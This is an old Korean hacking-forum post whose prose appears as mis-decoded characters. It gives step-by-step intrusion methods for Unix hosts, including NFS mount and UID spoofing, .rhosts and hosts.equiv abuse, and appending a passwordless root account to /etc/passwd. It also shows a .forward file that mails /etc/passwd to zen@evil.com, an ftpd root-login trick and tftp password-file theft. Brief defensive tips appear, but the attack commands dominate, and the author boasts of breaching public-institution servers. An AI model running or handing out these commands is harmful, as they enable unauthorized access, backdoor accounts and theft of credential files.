Hacking °ü·Ã °Ô½ÃÆÇ |
---|
2000/09/13(20:08) from 203.254.154.69 | |
ÀÛ¼ºÀÚ : °ÁÙ±â (jkkang65@hanmail.net) | Á¶È¸¼ö : 5288 , ÁÙ¼ö : 299 |
FTP ÇØÅ·¹æ¹ý |
---|
FTP ÇØÅ· ¹æ¹ý - ¾îµð¼ Æۿ;¸..¾î¼ ÆÛ¿Ô³ª ¸ð¸§ 1. ´Ù¸¥ ½Ã½ºÅÛÀÇ ³²ÀÇ µð·ºÅ丮 Á¢±ÙÇϱ⠸ÕÀú showmount·Î »ó´ëÆí ½Ã½ºÅÛÀÇ µð·ºÅ丮Áß °ø°³µÈ µð·ºÅ丮¸¦ ã´Â´Ù. evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy À§¸¦ º¸¸é °ø°³µÈ µð·ºÅ丮ÀÇ ¿°Å¸¦ º¼ ¼ö ÀÖ´Ù. ¿äÁòÀÇ ½Ã½ºÅÛ¿¡´Â À§¿Í °°ÀÌ °ø°³½ÃÅ°´Â °æ¿ì´Â µå¹°°í, ÀÖ´ÙÇÏ´õ¶óµµ º¸Åë Àº /usrµð·ºÅ丮 Á¤µµÀÌ´Ù. ÇÏÁö¸¸ /usrµð·ºÅ丮¸¸ °ø°³µÇ¾îµµ ¿ì¸®°¡ ÇÒ ¼ö ÀÖ´Â ¸ñÀûÀº ÃæºÐÈ÷ ´Þ¼ºÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½À¸·Î ÇÒ ÀÏÀº ÀÚ±âÀÇ ½Ã½ºÅÛ¿¡ ÀÖ´Â µð·ºÅ丮¿¡ »ó´ëÆíÀÇ °ø°³µÈ µð·ºÅ丮¸¦ ¸¶¿îÆ® ½ÃÅ°´Â ÀÏÀÌ´Ù. ÀÌÁ¦ºÎÅÍ´Â ÃÖ¼ÒÇÑ ·ç Æ®(root)ÀÇ ±ÇÇÑÀÌ ÀÖ¾î¾ßÇÑ´Ù. ·çÆ®°¡ ¾Æ´Ï¸é hackingµµ ¸øÇظԴ´Ù. '#'ÀÇ promptÇ¥½Ã´Â ·çÆ®ÀÇ promptÀÓÀ» ¸ðµÎ ¾Ë°ÍÀÌ´Ù. evil # mount victim.com:/usr /foo evil # cd /foo evil # ls -alg total 3 1 drwxr-xr-x 11 root deamon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jun 19 1991 . . 1 drwx--x--x 9 10001 deamon 1024 Jun 3 15:49 guest ÀÚ ÀÌÁ¦ »ó´ëÆí µð·ºÅ丮¸¦ ¸¶¿îÆ® ½ÃÄ×°í, ±× µð·ºÅ丮¸¦ µé¾î°¡¼ ±× ¾Æ·¡ guest¶ó´Â µð·ºÅ丮°¡ ÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù. ÀÌ µð·ºÅ丮´Â 1001ÀÇ UID¸¦ °®´Â »ç¶÷ÀÇ ¼ÒÀ¯ÀÓÀ» ¾Ë ¼ö ÀÖ°í, ±× »ç¶÷ÀÇ °èÁ¤ÀÌ guestÀÌ°í, homeµð·ºÅ丮°¡ ¹Ù·Î ÀÌ guestµð·ºÅä ¸®¶ó´Â °ÍÀ» ÃßÁ¤ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦ ¸ñÇ¥°¡ Á¤ÇØÁ³´Ù. ¾ÆÁ÷Àº ÀÌ µð·ºÅ丮ÀÇ Á¢±Ù ±ÇÇÑÀº otherÀÇ ±ÇÇѹۿ¡ ¾øÀ¸¹Ç·Î ±× »ç¶÷ÀÌ g uestµð·ºÅ丮ÀÇ otherÁ¢±Ù ±ÇÇÑÀ» ¸·¾Æ ³õ¾Ò´Ù¸é ¾ÆÁ÷Àº ±× µð·ºÅ丮¿¡ Á¢±Ù ÇÒ ¼ö °¡ ¾ø´Ù. ÀÌÁ¦ ÀÌ µð·ºÅ丮ÀÇ Á¢±Ù ±ÇÇÑÀ» ¾ò ¾îº¸ÀÚ. ¹æ¹ýÀº ¾ÆÁÖ °£´ÜÇÏ´Ù. ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ °°Àº UID¸¦ °®´Â »ç¶÷ÀÇ °èÁ¤À» Çϳª ¸¸µé¾î ÁÖ°í ³»°¡ ±× »ç¶÷ÀÌ µÇ´Â °Å´Ù ³Ê ¹«³ª ¿ì½À°Ô ½¬¿î ¹æ¹ýÀÌ´Ù. evil # echo guest:x:10001:1:temporary breakin account:/: >>/etc/passwd evil # ls -alg total 3 1 drwxr-xr-x 11 root deamon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jun 19 1991 . . 1 drwx--x--x 9 guest deamon 1024 Jun 3 15:49 guest ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ °°Àº °èÁ¤À» ¸¸µé¾îÁÖ°í ls¸¦ Çغ¸´Ï ÀÌÁ¦´Â UID°¡ ¼ýÀÚ·Î ³ª¿ÀÁö ¾Ê°í, °èÁ¤À¸·Î ¹Ù²î¾î ³ª¿Â´Ù. ÀÌÁ¦ ¸ðµç Áغñ´Â ³¡³µ´Ù. ³»°¡ ±× »ç¶÷ÀÌ µÇ¾î ±× »ç¶÷ µð·ºÅ丮¸¦ ¸¶À½´ë·Î »ç¿ëÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ ¿©±â¿¡ ÇϳªÀÇ Å×Å©´ÐÀÌ ´õ ÀÖ´Ù. ±× »ç¶÷ÀÇ homeµð·ºÅ丮¿¡ .rhost¶ó´Â ÆÄÀÏ¿¡ ÀÚ½ÅÀÇ ¼¹öÀ̸§À» Àû¾î ÁÖ¸é ´ÙÀ½ ºÎÅÍ´Â ³ªÀÇ ½Ã½ºÅÛ¿¡¼ ±×»ç¶÷ÀÌ µÈ ´ÙÀ½ ¹Ù·Î ±× ½Ã½ºÅÛÀ¸·Î ·Î±×ÀÎÀ» ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ¹°·Ð Æнº¿öµå°¡ ÇÊ¿ä¾øÀÌ... ±×·¸´Ù¸é Áö±Ý º¸´Ù´Â ´õ ¸¹Àº ÀϵéÀ» ±×°÷¿¡¼ ÇÒ ¼ö ÀְԵȴÙ. ÀÚ. ÀÌÁ¦ ¸¶Áö¸·ÀÌ´Ù. ¿©±â¼ 'evil.com'Àº ³» ½Ã½ºÅÛÀÇ µµ¸ÞÀÎ ³×ÀÓÀÌ´Ù. evil # su guest evil % echo evil.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com!! victim % ¸¸¾à¿¡ °ø°³µÈ µð·ºÅ丮°¡ /bin°ú °°ÀÌ ½ÇÇà ÆÄÀÏÀÌ ÀÖ´Â µð·ºÅ丮¶ó¸é ´ç½ÅÀº ±×°÷¿¡ Æ®·ÎÀÌ ¸ñ¸¶¸¦ ÀúÀå½ÃÄÑ ´Ù¸¥ »ç¶÷À¸·Î ÇÏ¿©±Ý ½ÇÇà½Ãų ¼ö µµ ÀÖÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸ ÀÌ ¹æ¹ýÀº ´ç½ÅÀÌ ±× ½Ã½ºÅÛ¿¡¼ rootÀÇ ±ÇÇÑÀ» °¡ÁöÁö ¸øÇϱ⠶§¹®¿¡ ´ç½ÅÀÌ ±×°÷¿¡ Á¢¼ÓÇÑ ±â·Ï ÆÄÀÏÀ» Áö¿ï ¼ö ¾ø´Ù . ±× ÂÊ¿¡¼ ¸¶À½¸¸ ¸ÔÀ¸¸é ´ç½ÅÀÇ °æ·Î¸¦ ÃßÀûÇÒ ¼öµµ ÀÖ´Ù. ºÎµð ´Ù¸¥ ½Ã½ºÅÛ¿¡ ÇØ°¡ µÇ´Â Àå³Àº ÇÏÁö ¸»°í °¡º¿î ½ÇÇè¿¡¼ ³¡³ª±â¸¦ ¹Ù¶õ´Ù. ÀÌ»ó. -------------------------------------------------------------------------------- 2. ´Ù¸¥ ½Ã½ºÅÛ¿¡¼ rootµÇ±â ÀÌ ¹æ¹ýÀÌ ÅëÇÏ´Â ½Ã½ºÅÛÀº ¿äÁòÀº °ÅÀÇ ¾ø´Ù. ÇÏÁö¸¸ °£È¤ ºÎ½ÇÇÑ ¿¾ ÄÄÇ»ÅÍ¿¡´Â ÅëÇÒ Áöµµ ¸ð¸£´Ï ÇÑ ¹øÂë µµÀüÇØ ºÁµµ ÁÁ´Ù . ¼º°øÇÑ´Ù¸é ´ç½ÅÀº ±× ½Ã½ºÅÛÀÇ ÃÖ°í ±Ç·ÂÀÚ°¡ µÈ´Ù. ÀÌ ¹æ¹ýÀº /etc/hosts.equiv¿¡ "+"ÀÇ ¿ÍÀϵå Ä«µå¸¦ °¡Áö°Å³ª ¾à°£ÀÇ ¹ö±×·Î ÀÎÇØ °¡´ÉÇØÁö´Âµ¥, ÇѸ¶µð·Î ·çÆ®°¡ ¾Æ ´Ñ »ç¶÷ÀÌ »ó´ëÆí È£½ºÆ®·Î Æнº¿öµå ¾øÀÌ ·Î±×ÀÎ Çؼ ±×°÷ÀÇ /etc/passwdÆÄÀÏÀ» ¼öÁ¤ÇÏ´Â °ÍÀÌ´Ù. ÀÌ ¹æ¹ýÀ» ½á¸Ô±â À§Çؼ´Â ¹°·Ð ´ç½ÅÀÌ ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡¼ ·çÆ®À̾î¾ßÇÑ´Ù. ¸ÕÀú ´ç½ÅÀº ´ç½Å ½Ã½ºÅÛ¿¡¼ binÀÌ µÈ´Ù. ±×¸®°í »ó´ëÆí È£½ºÆ®¿¡ ¸ÚÁö°Ô ·Î±×ÀÎ ÇÑ´ÙÀ½¿¡ ±×°÷ÀÇ Æнº¿öµå ÆÄÀÏ¿¡ ·çÆ®¿Í °°Àº UID¸¦ °¡Áö´Â ÀÚ½ÅÀÇ °èÁ¤À» Ãß°¡ ½ÃŲ ÈÄ À¯À¯È÷ ºüÁ®³ª¿Â´Ù. evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ÀÌÁ¦ ´ç½ÅÀº »ó´ëÆí ½Ã½ºÅÛÀ¸·Î µé¾î¿Ô´Ù. ¸¹Àº ÀÏÀ» ÇÒ ¼ö´Â ¾øÁö¸¸, ´ç½ÅÀÌ ÇÊ¿ä·Î ÇÏ´Â ÀÏÀº ÃæºÐÈ÷ °¡´ÉÇÏ´Ù. ÀÌÁ¦ /etcµð ·ºÅ丮¿¡ ÀÖ´Â passwdÆÄÀÏ¿¡ ÀÚ½ÅÀÇ °èÁ¤À» ½á ³Ö´Â´Ù. more³ª vi µîÀÇ ¸í·ÉÀº ÅëÇÏÁö ¾ÊÀ¸´Ï ¾Æ·¡ÀÇ ¹æ¹ýÀ» ±ÇÀåÇÑ´Ù. victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % ÀÌÁ¦ ¸ðµç °ÍÀÌ ³¡³µ´Ù. ´ç½ÅÀÇ ¸·°ÇÑ ·çÆ®±ÇÇÑÀ» °¡Áø °èÁ¤À¸·Î Á¢¼ÓÀ» Çغ¸¾Æ¶ó. evil % rlogin victim.com -l toor Welcome to victim.com! victim # À§ÀÇ ¹æ¹ýÀº ½Ã½ºÅÛÀÇ ±â·Ï ÆÄÀϵéÀÎ wtmp³ª utmp¿¡ ±â·ÏÀ» ³²±âÁö ¾Ê°í, finger³ª whoµîÀ¸·Îµµ ¾Ë¾Æ³¾ ¼ö°¡ ¾ø±â ¶§¹®¿¡ ²Ï ¾µ ¸¸ÇÑ ¹æ¹ýÀÌ´Ù. ÇÏÁö¸¸, ÀÌ ¹æ¹ý¿¡ ÀÇÇØ Á¢±ÙµÉ¸¸ÇÑ ½Ã½ºÅÛÀÌ ÇöÀç´Â ¸¹Áö ¾Ê´Ù. ÀÌ remote shellÀº Å͹̳ΠÀÇÁ¸ÀûÀÌÁö ¾Ê±â ¶§¹®¿¡ ¾Õ¿¡ ¸»ÇßµíÀÌ vi³ª more°°Àº ½ºÅ©¸°¿¡ ±â¹ÝÇÑ ÇÁ·Î±×·¥Àº µ¿ÀÛÇÏÁö ¾Ê´Â´Ù. COPS¶ó´Â ÀÚü º¸¾È ÇÁ·Î±×·¥Àº ÀÌ·¯ÇÑ ÇØÅ·¿¡ µå·¯³ Ãë¾àÁ¡À» ¹ß°ßÇØÁÖ´Ï °ü¸®ÀÚ´Â ÇÑ ¹øÂë »ç¿ëÇØ º¸±â¸¦ ±ÇÇÑ´Ù. tcp wrapper°°Àº ÇÁ·Î±×·¥µµ ÀÌ·¯ÇÑ ·Î±×ÀÎÀ» ¹ß°ßÇÒ ¼ö ÀÖÀ¸´Ï °ü½ÉÀÖ´Â »ç¶÷Àº »ç¿ëÇØ º¸¼¼¿ä. -------------------------------------------------------------------------------- 3. FTP¿Í ¸ÞÀÏÀ» ÀÌ¿ëÇÏ¿© »ó´ëÆí È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â À̹æ¹ýÀº ¸ÕÀú anonymous¼ºñ½º¸¦ ÇØÁÖ´Â ftp¼¹ö¿¡¼ ftpÀÇ home µð·ºÅ丮°¡ ¿äÁòó·³ ~ftp/ °°ÀÌ µû·Î ÀÖÁö ¾Ê°í rootµð·ºÅä ¸®¿¡ ÀÖÀ» °æ¿ì¿Í ±× µð·ºÅ丮¿¡ ÆÄÀÏÀ» ¿Ã·Á³õÀ» ¼ö ÀÖ°Ô µÈ ½Ã½ºÅÛ¿¡¼¸¸ °¡´ÉÇÏ´Ù. ¿©±â¼´Â mail¿¡¼ »ç¿ëµÇ´Â .forwardÆÄÀÏÀ» »ç¿ëÇÑ´Ù. .forward´Â ¾î¶°ÇÑ °èÁ¤ÀÇ homeµð·ºÅ丮¿¡ ÀÖÀ¸¸é¼ ±× °èÁ¤À¸·Î ¿Â mailÀ» ´Ù¸¥ °÷À¸·Î º¸³»Áִ°Ϳ¡ ´ëÇÑ Á¤º¸°¡ ±â·ÏµÈ´Ù. ´ç½ÅÀº ¸ÕÀú ftp¿¡ Á¢¼ÓÀ» ÇÑ´Ù. ±×·¯¸é ·Î±×ÀÎ µÈ µð·ºÅ丮´Â ±×°÷ÀÇ rootµð·ºÅ丮ÀÏ °ÍÀÌ°í, ±×°÷ÀÇ /etc¿¡´Â passwdÆÄÀÏÀÌ ÀÖÀ» °ÍÀÌ´Ù. ÀÌ°ÍÀ» °¡Á®¿À´Â °ÍÀÌ´Ù. ±×°÷ ftpÀÇ homeµð·ºÅ丮, Áï rootµð·ºÅ丮¿¡´Ù ´ç½ÅÀÌ ±×°÷¿¡ Á¢¼ÓÇϱâÀü¿¡ ¹Ì¸® ¸¸µé¾î ³õÀº ÆÄÀÏÀ» .forward¶ó´Â À̸§À¸·Î ¿Ã·Á³õ´Â´Ù. ±×·¯¸é ÀÌÁ¦ passwdÆÄÀÏÀ» °¡Á®¿À±â À§ÇÑ Áغñ°¡ ³¡³´Ù. ¿©±â¼ zenÀº ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ÀÖ´Â ÀÚ½ÅÀÇ °èÁ¤ÀÌ´Ù. °¡Àå ¸ÕÀú .forward·Î ¿Ã·ÁÁö°Ô µÉ ÆÄÀÏÀ» ÀÛ¼ºÇÑ´Ù. evil % cat forward_suck_file "|/bin/mail zen@evil.com < /etc/passwd" ÀÌÁ¦ ftp¼¹ö¿¡ Á¢¼ÓÇؼ ÀÌ ÆÄÀÏÀ» .forward¶ó´Â À̸§À¸·Î ftpÀÇ homeµð·ºÅ丮¿¡ ¿Ã·Á³õ´Â´Ù. evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen) : ftp 331 Guest login ok, send ident as password. password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 byte). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 . . drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 byte received in 0.066 seconds (3.6 Kbyte/s) ftp> put forward_sucker_file .forwar d 43 byte sent in 0.0015 seconds (28 Kbyte/s) ftp> quit evil % ÀÚ ÀÌÁ¦ ±×°÷ÀÇ ftp¿¡°Ô ÆíÁö¸¦ º¸³»º¸ÀÚ ´ç½ÅÀÌ ¿Ã·Á³õÀº .forwardÆÄÀÏ¿¡ ÀÇÇØ ±×°÷ÀÇ passwdÆÄÀÏÀÌ ´ç½Å¿¡°Ô mail·Î Àü´ÞµÉ °ÍÀÌ´Ù. evil % echo test | mail ftp@victim.com COPS¶ó´Â ÀÚü º¸¾È ÇÁ·Î±×·¥Àº ´ç½ÅÀÇ ½Ã½ºÅÛ¿¡ ÀÌ·¯ÇÑ FTPÀÇ ±¸¸ÛÀÌ ÀÖ´ÂÁö¸¦ Á¡°ËÇØÁØ´Ù. ÀÌ·¯ÇÑ Ãë¾àÁ¡Àº 100% °ü¸®ÀÚÀÇ ¼ÒȦÀÌ´Ù. ftpÀÇ homeµð·ºÅ丮¸¦ µû·Î ~ftp/¿¡ ¸¸µé¾î ÁÖµçÁö °¢ µð·ºÅ丮¿Í ÆÄÀÏÀÇ Á¢±Ù ±ÇÇÑÀ» ÀûÀýÈ÷ ÁöÁ¤ÇØ Áشٸé Àý´ë ÀϾÁö ¾ÊÀ» hacking¹æ¹ýÀÌ´Ù. -------------------------------------------------------------------------------- 4. FTP¿¡¼ root±ÇÇÑÀ» °¡Áö´Â ¿¾³¯ ¹æ¹ý ÀÌ ¹æ¹ýÀº ftp¿¡¼ rootÀÇ ±ÇÇÑÀ» ȹµæÇÏ´Â ¿À·¡ÀüÀÇ ¹æ¹ýÀÌ´Ù. ¹°·Ð ´ç½ÅÀÇ ½Ã½ºÅÛÀÌ ¾ÆÁ÷µµ ÀÌ·± bug¸¦ °¡Áø ftpd·Î ±¸µ¿µÇ°í ÀÖ´Ù¸é ftpd¸¦ ºü¸¥ ½ÃÀϳ»¿¡ ¾÷±×·¹ÀÌµå ½ÃÄÑ¾ß ÇÒ °ÍÀÌ´Ù. ÇØÅ· ¹æ¹ýÀº °£´ÜÇÏ´Ù. ¾Æ·¡¿Í °°ÀÌ ¸îÁÙÀÇ °£´ÜÇÑ ¸í·ÉÀ¸·Î ³¡À̳´Ù . evil % ftp -n ftp> open victim.com connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restriction apply. ftp> ls -al / (or whatever) ¸¸¾à¿¡ À§ÀÇ ¹æ¹ýÀÌ ¼º°øµÇ¾ú´Ù¸é, ´ç½ÅÀº ftp¿¡ rootÀÇ ±ÇÇÑÀ¸·Î loginµÈ °ÍÀÌ´Ù. ´ç½ÅÀº ftpÀÇ ¸ðµç ±â´ÉÀ» È°¿ëÇØ passwdÆÄ ÀÏÀ» ¹Ù²Ù°Å³ª ´ç½ÅÀÌ ¿øÇÏ´Â ¸ðµçÀÏÀ» ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦´Â ÀÌ·± ¹ö±×¸¦ °¡Áø ½Ã½ºÅÛÀÌ ¾ø°ÚÁö¸¸ ¾ÆÁ÷µµ ÀÖ´Ù¸é ºÎµð °¢¼º¹Ù¶õ´Ù. À§¿¡ ¹æ¹ýÀº ¿ì¸®³ª¶ó¿¡ÀÖ´Â °ø°ø ±â°ü¼¹ö´Â ´Ù ¸ÔÈûµû Çغ»°á°ú.. ^^ 5. tftp·Î »ó´ë È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â ftp¿Í ºñ½ÁÇÑ ÇÁ·Î±×·¥À¸·Î tft³ª ±âŸ ±âº»ÀûÀÎ ±â´ÉÀ» °¡Áø ÆÄÀÏÀü¼Û ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù. ÀÌ µ¥¸óÀº È®ÀÎÀ» À§ÇØ ºñ¹Ð¹øÈ£¸¦ ¿ä±¸ÇÏÁö ¾Ê´Â´Ù. ¸¸¾à¿¡ ±× ½Ã½ºÅÛ¿¡¼ Ưº°È÷ Á¢±Ù±ÇÇÑÀ» Á¦ÇÑÇÏÁö ¾Ê¾Ò´Ù¸é ´ç½ÅÀº ±× ½Ã½ºÅÛ¿¡ Àаųª ¾²±â¸¦ ¸¶À½´ë·Î ÇÒ ¼ö ÀÖ´Ù. ¾Æ·¡¿Í °°ÀÌ ÇÏ¸é °£´ÜÈ÷ ÀÚ½ÅÀÇ /tmp µð·ºÅ丮·Î »ó´ë È£½ºÆ®ÀÇ /etc/passwd ÆÄÀÏÀ» °¡Á®¿Ã ¼ö ÀÖ´Ù. evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit À§¿¡¼¿Í °°Àº µµµÏÁúÀ» ¸·±â À§Çؼ´Â ¿ª½Ã °£´ÜÇÏ´Ù. tftp°°Àº ÇÁ·Î±×·¥À» »ç¿ëÇÏÁö ¸øÇÏ°Ô ÇÏ¸é µÈ´Ù. tftp°¡ ²À ÇÊ¿äÇÏ´Ù¸é , ¾ÈÀüÀ» À§ÇØ Ç÷¡±×³ª ¿É¼Ç µîÀ» ÀûÀýÈ÷ »ç¿ëÇÏ¿© Á¢±Ù ±ÇÇÑÀ» Á¦ÇÑÇϰųª, chroot wrapper ÇÁ·Î±×·¥ÀÇ °ü¸® ¾Æ·¡¿¡ µÎ¸é µÈ´Ù . |